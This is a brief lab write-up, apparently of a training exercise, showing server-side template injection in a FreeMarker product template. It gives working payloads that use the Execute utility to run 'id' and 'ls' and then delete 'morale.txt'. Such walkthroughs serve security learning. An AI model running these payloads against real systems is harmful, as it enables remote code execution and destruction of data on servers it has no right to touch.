First, we need to “View details” of a product and click “Edit template”. We can see that the template get data by using ${product.name}
.
Changing it to ${a}
and click “Preview” raised an exception with the name of the template which is FreeMarker template.
According to @albinowax in Server-Side Template Injection, to execute ‘id
‘ command, we inject:
<#assign ex="freemarker.template.utility.Execute"?new()> ${ ex("id") }
Then, we execute ‘ls
‘ and there is a file named 'morale.txt
‘.
<#assign ex="freemarker.template.utility.Execute"?new()> ${ ex("ls") }
Remove the file with:
<#assign ex="freemarker.template.utility.Execute"?new()> ${ ex("rm morale.txt") }